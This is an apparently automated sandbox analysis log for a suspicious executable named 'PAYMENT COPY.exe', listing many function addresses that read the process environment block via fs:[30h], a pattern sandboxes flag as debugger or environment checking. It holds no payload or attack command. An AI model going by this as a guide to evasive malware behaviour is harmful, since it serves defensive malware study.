Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01558158 mov eax, dword ptr fs:[00000030h]	9_2_01558158
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]	9_2_01554144
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]	9_2_01554144
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01554144 mov ecx, dword ptr fs:[00000030h]	9_2_01554144
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]	9_2_01554144
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]	9_2_01554144
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6154 mov eax, dword ptr fs:[00000030h]	9_2_014C6154
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6154 mov eax, dword ptr fs:[00000030h]	9_2_014C6154
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BC156 mov eax, dword ptr fs:[00000030h]	9_2_014BC156
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594164 mov eax, dword ptr fs:[00000030h]	9_2_01594164
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594164 mov eax, dword ptr fs:[00000030h]	9_2_01594164
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01580115 mov eax, dword ptr fs:[00000030h]	9_2_01580115
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156A118 mov ecx, dword ptr fs:[00000030h]	9_2_0156A118
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156A118 mov eax, dword ptr fs:[00000030h]	9_2_0156A118
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156A118 mov eax, dword ptr fs:[00000030h]	9_2_0156A118
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156A118 mov eax, dword ptr fs:[00000030h]	9_2_0156A118
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]	9_2_0156E10E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F0124 mov eax, dword ptr fs:[00000030h]	9_2_014F0124
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0153E1D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0153E1D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_0153E1D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0153E1D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0153E1D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015861C3 mov eax, dword ptr fs:[00000030h]	9_2_015861C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015861C3 mov eax, dword ptr fs:[00000030h]	9_2_015861C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F01F8 mov eax, dword ptr fs:[00000030h]	9_2_014F01F8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015961E5 mov eax, dword ptr fs:[00000030h]	9_2_015961E5
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]	9_2_0154019F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]	9_2_0154019F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]	9_2_0154019F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]	9_2_0154019F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01500185 mov eax, dword ptr fs:[00000030h]	9_2_01500185
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01564180 mov eax, dword ptr fs:[00000030h]	9_2_01564180
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01564180 mov eax, dword ptr fs:[00000030h]	9_2_01564180
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BA197 mov eax, dword ptr fs:[00000030h]	9_2_014BA197
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BA197 mov eax, dword ptr fs:[00000030h]	9_2_014BA197
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BA197 mov eax, dword ptr fs:[00000030h]	9_2_014BA197
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157C188 mov eax, dword ptr fs:[00000030h]	9_2_0157C188
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157C188 mov eax, dword ptr fs:[00000030h]	9_2_0157C188
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546050 mov eax, dword ptr fs:[00000030h]	9_2_01546050
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C2050 mov eax, dword ptr fs:[00000030h]	9_2_014C2050
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EC073 mov eax, dword ptr fs:[00000030h]	9_2_014EC073
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01544000 mov ecx, dword ptr fs:[00000030h]	9_2_01544000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]	9_2_014DE016
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]	9_2_014DE016
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]	9_2_014DE016
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]	9_2_014DE016
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01556030 mov eax, dword ptr fs:[00000030h]	9_2_01556030
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BA020 mov eax, dword ptr fs:[00000030h]	9_2_014BA020
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BC020 mov eax, dword ptr fs:[00000030h]	9_2_014BC020
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015420DE mov eax, dword ptr fs:[00000030h]	9_2_015420DE
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015020F0 mov ecx, dword ptr fs:[00000030h]	9_2_015020F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C80E9 mov eax, dword ptr fs:[00000030h]	9_2_014C80E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BA0E3 mov ecx, dword ptr fs:[00000030h]	9_2_014BA0E3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015460E0 mov eax, dword ptr fs:[00000030h]	9_2_015460E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BC0F0 mov eax, dword ptr fs:[00000030h]	9_2_014BC0F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C208A mov eax, dword ptr fs:[00000030h]	9_2_014C208A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015860B8 mov eax, dword ptr fs:[00000030h]	9_2_015860B8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015860B8 mov ecx, dword ptr fs:[00000030h]	9_2_015860B8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B80A0 mov eax, dword ptr fs:[00000030h]	9_2_014B80A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015580A8 mov eax, dword ptr fs:[00000030h]	9_2_015580A8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01568350 mov ecx, dword ptr fs:[00000030h]	9_2_01568350
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]	9_2_0154035C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]	9_2_0154035C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]	9_2_0154035C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154035C mov ecx, dword ptr fs:[00000030h]	9_2_0154035C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]	9_2_0154035C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]	9_2_0154035C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158A352 mov eax, dword ptr fs:[00000030h]	9_2_0158A352
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0159634F mov eax, dword ptr fs:[00000030h]	9_2_0159634F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]	9_2_01542349
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156437C mov eax, dword ptr fs:[00000030h]	9_2_0156437C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA30B mov eax, dword ptr fs:[00000030h]	9_2_014FA30B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA30B mov eax, dword ptr fs:[00000030h]	9_2_014FA30B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA30B mov eax, dword ptr fs:[00000030h]	9_2_014FA30B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BC310 mov ecx, dword ptr fs:[00000030h]	9_2_014BC310
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E0310 mov ecx, dword ptr fs:[00000030h]	9_2_014E0310
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01598324 mov eax, dword ptr fs:[00000030h]	9_2_01598324
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01598324 mov ecx, dword ptr fs:[00000030h]	9_2_01598324
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01598324 mov eax, dword ptr fs:[00000030h]	9_2_01598324
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01598324 mov eax, dword ptr fs:[00000030h]	9_2_01598324
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015643D4 mov eax, dword ptr fs:[00000030h]	9_2_015643D4
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015643D4 mov eax, dword ptr fs:[00000030h]	9_2_015643D4
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]	9_2_014CA3C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]	9_2_014CA3C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]	9_2_014CA3C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]	9_2_014CA3C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]	9_2_014CA3C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]	9_2_014CA3C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]	9_2_014C83C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]	9_2_014C83C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]	9_2_014C83C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]	9_2_014C83C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E3DB mov eax, dword ptr fs:[00000030h]	9_2_0156E3DB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E3DB mov eax, dword ptr fs:[00000030h]	9_2_0156E3DB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E3DB mov ecx, dword ptr fs:[00000030h]	9_2_0156E3DB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156E3DB mov eax, dword ptr fs:[00000030h]	9_2_0156E3DB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015463C0 mov eax, dword ptr fs:[00000030h]	9_2_015463C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157C3CD mov eax, dword ptr fs:[00000030h]	9_2_0157C3CD
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]	9_2_014D03E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F63FF mov eax, dword ptr fs:[00000030h]	9_2_014F63FF
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE3F0 mov eax, dword ptr fs:[00000030h]	9_2_014DE3F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE3F0 mov eax, dword ptr fs:[00000030h]	9_2_014DE3F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE3F0 mov eax, dword ptr fs:[00000030h]	9_2_014DE3F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E438F mov eax, dword ptr fs:[00000030h]	9_2_014E438F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E438F mov eax, dword ptr fs:[00000030h]	9_2_014E438F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BE388 mov eax, dword ptr fs:[00000030h]	9_2_014BE388
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BE388 mov eax, dword ptr fs:[00000030h]	9_2_014BE388
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BE388 mov eax, dword ptr fs:[00000030h]	9_2_014BE388
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B8397 mov eax, dword ptr fs:[00000030h]	9_2_014B8397
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B8397 mov eax, dword ptr fs:[00000030h]	9_2_014B8397
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B8397 mov eax, dword ptr fs:[00000030h]	9_2_014B8397
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0159625D mov eax, dword ptr fs:[00000030h]	9_2_0159625D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157A250 mov eax, dword ptr fs:[00000030h]	9_2_0157A250
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157A250 mov eax, dword ptr fs:[00000030h]	9_2_0157A250
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C6259 mov eax, dword ptr fs:[00000030h]	9_2_014C6259
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01548243 mov eax, dword ptr fs:[00000030h]	9_2_01548243
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01548243 mov ecx, dword ptr fs:[00000030h]	9_2_01548243
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BA250 mov eax, dword ptr fs:[00000030h]	9_2_014BA250
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B826B mov eax, dword ptr fs:[00000030h]	9_2_014B826B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C4260 mov eax, dword ptr fs:[00000030h]	9_2_014C4260
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C4260 mov eax, dword ptr fs:[00000030h]	9_2_014C4260
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C4260 mov eax, dword ptr fs:[00000030h]	9_2_014C4260
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B823B mov eax, dword ptr fs:[00000030h]	9_2_014B823B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]	9_2_014CA2C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]	9_2_014CA2C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]	9_2_014CA2C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]	9_2_014CA2C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]	9_2_014CA2C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015962D6 mov eax, dword ptr fs:[00000030h]	9_2_015962D6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D02E1 mov eax, dword ptr fs:[00000030h]	9_2_014D02E1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D02E1 mov eax, dword ptr fs:[00000030h]	9_2_014D02E1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D02E1 mov eax, dword ptr fs:[00000030h]	9_2_014D02E1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE284 mov eax, dword ptr fs:[00000030h]	9_2_014FE284
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE284 mov eax, dword ptr fs:[00000030h]	9_2_014FE284
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01540283 mov eax, dword ptr fs:[00000030h]	9_2_01540283
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01540283 mov eax, dword ptr fs:[00000030h]	9_2_01540283
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01540283 mov eax, dword ptr fs:[00000030h]	9_2_01540283
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D02A0 mov eax, dword ptr fs:[00000030h]	9_2_014D02A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D02A0 mov eax, dword ptr fs:[00000030h]	9_2_014D02A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]	9_2_015562A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015562A0 mov ecx, dword ptr fs:[00000030h]	9_2_015562A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]	9_2_015562A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]	9_2_015562A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]	9_2_015562A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]	9_2_015562A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C8550 mov eax, dword ptr fs:[00000030h]	9_2_014C8550
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C8550 mov eax, dword ptr fs:[00000030h]	9_2_014C8550
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F656A mov eax, dword ptr fs:[00000030h]	9_2_014F656A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F656A mov eax, dword ptr fs:[00000030h]	9_2_014F656A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F656A mov eax, dword ptr fs:[00000030h]	9_2_014F656A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01556500 mov eax, dword ptr fs:[00000030h]	9_2_01556500
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]	9_2_01594500
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]	9_2_01594500
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]	9_2_01594500
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]	9_2_01594500
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]	9_2_01594500
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]	9_2_01594500
